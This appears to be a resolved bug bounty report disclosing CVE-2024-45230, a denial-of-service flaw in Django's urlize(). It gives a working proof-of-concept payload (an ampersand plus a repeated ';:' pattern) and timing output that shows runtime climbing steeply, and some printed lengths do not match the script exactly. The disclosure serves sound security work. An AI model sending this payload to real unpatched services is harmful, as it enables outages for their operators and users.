CVE-2024-45230 - Potential denial-of-service in django.utils.html.urlize() (Another pattern)
Medium
I
Internet Bug Bounty
Submitted None
Team Summary
Official summary from Internet Bug Bounty
VE-2024-45230: Potential denial-of-service vulnerability in django.utils.html.urlize() urlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
Actions:
Reported by
mprogrammer
Vulnerability Details
Technical details and impact analysis
This one is similar to https://hackerone.com/reports/2795558, but I found the DoS vulnerability by putting an ampersand character beside repeated `;:` characters.
This is the PoC that I used:
```
import django.utils.html
from time import time
print("=== django.utils.html.urlize('&' + ';:' * n) ===")
for i in range(0,600000, 40000):
start = time()
pattern = ';:'
PAYLOAD = '&' + pattern * i
django.utils.html.urlize(PAYLOAD)
print(len(PAYLOAD), "\t", time() - start)
input("")
```
```
=== django.utils.html.urlize('&' + ';:' * n) ===
2 0.0
80002 0.8933408260345459
160002 3.4347267150878906
240002 7.70803427696228
320002 14.04338812828064
400002 23.33271551132202
480002 34.01262950897217
560002 50.18527007102966
640002 66.2295835018158
720002 84.84082579612732
800002 105.49288773536682
880002 125.54152035713196
960002 155.80166292190552
1040002 187.27826762199402
```
## Impact
Reduced performance or Denial of Service was possible if `django.utils.html.urlize` was used without strict limits on a large user string.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$2162.00
Submitted
Weakness
Allocation of Resources Without Limits or Throttling